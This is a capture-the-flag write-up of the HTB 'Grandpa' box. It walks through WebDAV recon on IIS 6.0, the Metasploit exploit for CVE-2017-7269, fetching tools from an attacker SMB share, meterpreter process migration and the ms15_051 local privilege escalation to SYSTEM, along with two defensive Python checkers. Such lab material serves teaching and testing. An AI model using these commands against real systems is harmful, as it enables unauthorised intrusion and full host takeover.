🕵 HTB-Writeup : GRANDPA

Recon

nmap

nmap -A -sV -Pn -T5 10.10.10.14

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   WebDAV type: Unknown
|   Server Type: Microsoft-IIS/6.0
|_  Server Date: Sat, 30 Jul 2022 11:18:40 GMT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

We are facing an IIS 6.0 web server.

Vulnerabilities

Running Nikto, we found some useful information. Many HTTP methods are allowed on the server. We found a /_vti_bin directory, meaning that a SharePoint service is up. We also see that WebDAV is enabled on the server.

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.14
+ Target Hostname:    10.10.10.14
+ Target Port:        80
+ Start Time:         2022-07-30 11:20:52 (GMT0)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
+ Retrieved microsoftofficewebserver header: 5.0_Pub
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
+ Retrieved x-aspnet-version header: 1.1.4322
+ Retrieved dasl header: <DAV:sql>
+ Retrieved dav header: 1, 2
+ Retrieved ms-author-via header: MS-FP/4.0,DAV
+ Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH 
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH 
+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (PROPPATCH COPY LOCK PROPFIND MKCOL UNLOCK SEARCH listed as allowed)
+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://10.10.10.14/
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
+ OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found.
+ OSVDB-3233: /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed.
+ OSVDB-3233: /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information).
+ OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
+ /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found.
+ /_vti_bin/_vti_adm/admin.exe: FrontPage/Sharepointfile available.
+ /_vti_bin/_vti_aut/author.exe: FrontPage/Sharepointfile available.
+ /_vti_bin/_vti_aut/author.dll: FrontPage/Sharepointfile available.
+ 26658 requests: 0 error(s) and 30 item(s) reported on remote host
+ End Time:           2022-07-30 11:38:15 (GMT0) (1043 seconds)
---------------------------------------------------------------------------

While searching the web, we found an old vulnerability: a buffer overflow in fpcount.exe on IIS version 4.0.

Pushing a little further, I found a similar vulnerability in IIS 6.0.

According to a Trend Micro article:

“Microsoft Internet Information Services (IIS) 6.0 is vulnerable to a zero-day buffer overflow that leads to arbitrary code execution due to an improper validation of an ‘IF’ header in a PROPFIND request.”

The Nikto scan showed us all allowed HTTP Methods:

+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH

The PROPFIND method is allowed! Let’s try exploiting this vulnerability!
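From the defender’s side, the trigger described above (a PROPFIND request carrying an abnormally long or non-ASCII ‘If’ header) is easy to spot at a reverse proxy or in captured traffic. The following is an added example, not code from the write-up; the 512-byte threshold and the sample requests are constructed assumptions.

```python
"""Flag WebDAV PROPFIND requests whose If: header looks like a CVE-2017-7269
attempt, plus use of write-capable WebDAV methods that IIS 6.0 exposes here.
Added defender-side example; threshold and samples are assumptions."""
from typing import Dict, List, Tuple

IF_HEADER_MAX = 512   # assumption: legitimate If: headers are far shorter
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}

def parse_request(raw: bytes) -> Tuple[str, str, Dict[str, bytes]]:
    """Split a raw HTTP/1.x request head into (method, target, headers).
    Header names are lower-cased; values are kept as bytes."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    parts = lines[0].decode("ascii", "replace").split(" ")
    method, target = parts[0], (parts[1] if len(parts) > 1 else "")
    headers: Dict[str, bytes] = {}
    for line in lines[1:]:
        if b":" in line:
            name, value = line.split(b":", 1)
            headers[name.decode("ascii", "replace").strip().lower()] = value.strip()
    return method, target, headers

def assess(raw: bytes) -> List[str]:
    """Return findings for one request; an empty list means nothing suspicious."""
    method, target, headers = parse_request(raw)
    findings: List[str] = []
    if_hdr = headers.get("if", b"")
    if method == "PROPFIND" and len(if_hdr) > IF_HEADER_MAX:
        findings.append(f"PROPFIND {target}: If header is {len(if_hdr)} bytes "
                        f"(> {IF_HEADER_MAX})")
    if method == "PROPFIND" and any(b > 0x7F for b in if_hdr):
        findings.append(f"PROPFIND {target}: non-ASCII bytes in If header")
    if method in WRITE_METHODS:
        findings.append(f"{method} {target}: write-capable WebDAV method used")
    return findings

# Constructed samples: a normal PROPFIND, and one with an oversized If header
BENIGN = (b"PROPFIND /docs/ HTTP/1.1\r\nHost: 10.10.10.14\r\nDepth: 1\r\n"
          b"If: <http://10.10.10.14/docs/> (<opaquelocktoken:abc>)\r\n\r\n")
SUSPECT = (b"PROPFIND / HTTP/1.1\r\nHost: 10.10.10.14\r\n"
           b"If: <http://10.10.10.14/" + b"A" * 600 + b"> (Not <locktoken:x>)\r\n\r\n")

if __name__ == "__main__":
    for sample in (BENIGN, SUSPECT):
        print(assess(sample) or ["clean"])
```

Disabling WebDAV (or removing IIS 6.0 altogether) is the real fix; this check only makes attempts visible.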

Exploit

We search the Metasploit console for an exploit for this vulnerability. This zero-day has been assigned the CVE identifier CVE-2017-7269.

msf6 > search CVE-2017-7269

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes    Microsoft IIS WebDav ScStoragePathFromUrl Overflow

msf6 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl

There is a Metasploit module for this CVE. We try to exploit it:

# set all required options
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit

c:\windows\system32\inetsrv>whoami
nt authority\network service

We got a shell! We are connected to the server with nt authority\network service permissions. While browsing the directories we find the users’ home folders, but we can’t list their files: we don’t have the permissions.

 Directory of C:\Documents and Settings

04/12/2017  05:32 PM    <DIR>          .
04/12/2017  05:32 PM    <DIR>          ..
04/12/2017  05:12 PM    <DIR>          Administrator
04/12/2017  05:03 PM    <DIR>          All Users
04/12/2017  05:32 PM    <DIR>          Harry
               0 File(s)              0 bytes
               5 Dir(s)   1,290,956,800 bytes free

C:\Documents and Settings>cd Harry 
cd Harry
Access is denied.

Server Recon

I start by gathering system information, users and running processes to try to find an entry point.

c:\windows\system32\inetsrv> systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
Hotfix(s):                 1 Hotfix(s) Installed.

C:\WINDOWS\system32\inetsrv>net user
User accounts for \\GRANPA
-------------------------------------------------------------------------------
Administrator            ASPNET                   Guest                    
Harry                    IUSR_GRANPA              IWAM_GRANPA  

# list process
Tasklist /SVC

I found some processes started as nt authority\network service.

Searching for privesc vulnerabilities

Then, I try to run WinPEAS on the target to find something interesting. I use the .bat version because the box only has 1 GB of memory; binaries like WinPEAS.exe or Mimikatz can’t be run on the server. I got the error “Program too big to fit in memory” each time I tried to run a program.

# create a smb share with impacket on host
impacket-smbserver coucou . -smb2support

# copy file into the target
copy \\10.10.16.8\coucou\WinPeas.bat c:\Windows\Temp\.

No result from WinPEAS.

Then, I used Windows-Exploit-Suggester, which builds a list of potential vulnerabilities of the system. The tool requires the output of the systeminfo command.

# get mssb database
python2 windows-exploit-suggester.py --update
# run tool, provide systeminfo from the target on the -i option
python2 windows-exploit-suggester.py -i sysinfo.txt -d 2022-07-31-mssb.xls

It gave me a long list of vulnerabilities. After some more research and tests, I was unable to privesc.

Next, I checked the privilege information of our user with the whoami /all command.

whoami /all

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAuditPrivilege              Generate security audits                  Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 

The SeImpersonatePrivilege privilege is enabled! We can try to impersonate other users to run commands as them.
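For auditing, the same whoami /all table can be parsed automatically so that enabled high-impact privileges on service accounts (SeImpersonatePrivilege is held by IIS worker accounts by design, which is exactly why it is worth tracking) show up in a report. This is an added example, not code from the write-up; the watch-list is an assumption and the sample text is the table shown above.

```python
"""Parse the PRIVILEGES INFORMATION table printed by `whoami /all` and flag
enabled privileges that an auditor treats as privilege-escalation relevant.
Added example; WATCHLIST is an assumption, SAMPLE is the write-up's table."""
import re
from typing import Dict, List

# Assumption: privileges that warrant review when Enabled on a service account
WATCHLIST = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege",
             "SeDebugPrivilege", "SeTcbPrivilege", "SeLoadDriverPrivilege",
             "SeBackupPrivilege", "SeRestorePrivilege", "SeTakeOwnershipPrivilege"}

def parse_privileges(text: str) -> Dict[str, str]:
    """Return {privilege_name: state} from the privileges table.
    Rows follow the '=====' separator line; the name is the first token and the
    state (Enabled/Disabled) the last, so descriptions containing spaces are fine."""
    privs: Dict[str, str] = {}
    in_table = False
    for line in text.splitlines():
        if re.fullmatch(r"(=+\s*)+", line.strip()):   # column separator row
            in_table = True
            continue
        if in_table:
            parts = line.split()
            if len(parts) < 2:          # blank line (or junk) ends the table
                break
            privs[parts[0]] = parts[-1]
    return privs

def enabled_watchlist(text: str) -> List[str]:
    """Sorted names of watch-listed privileges that are currently Enabled."""
    return sorted(n for n, s in parse_privileges(text).items()
                  if n in WATCHLIST and s == "Enabled")

SAMPLE = """PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAuditPrivilege              Generate security audits                  Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

if __name__ == "__main__":
    print("review:", enabled_watchlist(SAMPLE))
```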

I tried to impersonate with [RottenPotato](https://github.com/foxglovesec/RottenPotato) & [JuicyPotato](https://github.com/ohpe/juicy-potato), then with [PrintSpoofer](https://github.com/itm4n/PrintSpoofer), but…


As CJ says, again we got a memory error…

Last resort: Metasploit

I background my meterpreter session, then search for exploits with post/multi/recon/local_exploit_suggester, which tests multiple exploits and reports whether the target is potentially vulnerable.

msf6 > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 2
msf6 post(multi/recon/local_exploit_suggester) > run
 1   exploit/windows/local/ms10_015_kitrap0d                        Yes                      The service is running, but could not be validated.
 2   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/ms14_070_tcpip_ioctl                     Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/ms16_016_webdav                          Yes                      The service is running, but could not be validated.
 6   exploit/windows/local/ppr_flatten_rec                          Yes                      The target appears to be vulnerable.

The target appears to be vulnerable to several exploits! But none of them currently works. This is because the modules use meterpreter commands like getsid, but we currently get an access denied error when trying to get system information from the meterpreter prompt:

meterpreter > getsid
[-] stdapi_sys_config_getsid: Operation failed: Access is denied.

After hours of hassle I found that it is possible to migrate from process to process to execute meterpreter commands. We spawned in a process that didn’t have enough privileges; that’s why none of our exploits were working. To fix this, we start by identifying processes owned by nt authority\network service.

meterpreter > ps
 1968  584   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 2160  1492  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2228  584   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe

I take the PID of another process, here PID 1968 (the wmiprvse.exe process), and switch our session to it by passing it to the migrate command in meterpreter.

meterpreter > migrate 1968
[*] Migrating from 2276 to 1968...
[*] Migration completed successfully.

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE

It works! We can now use meterpreter commands to get system information. Then, I re-tried one of the modules I found earlier.

msf6 exploit(windows/local/ms15_051_client_copy_image) > run

[*] Started reverse TCP handler on 10.10.16.8:4445 
[*] Reflectively injecting the exploit DLL and executing it...
[*] Launching netsh to host the DLL...
[+] Process 3312 launched.
[*] Reflectively injecting the DLL into 3312...
[*] Sending stage (175686 bytes) to 10.10.10.14
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 4 opened (10.10.16.8:4445 -> 10.10.10.14:1031) at 2022-08-01 01:48:21 +0200

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

C:\Documents and Settings\Harry\Desktop>type user.txt
type user.txt
*************************6a5d869

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
*************************f28bb7b

One of the exploits works! We got a SYSTEM shell! We can now grab both flags.

Tags

Easy, External, IIS, ASP, Penetration Tester Level 2, Unrestricted File Upload, CVE-2017-7269, Enumeration, WebDav, Misconfiguration, Public Vulnerabilities, CVE Exploitation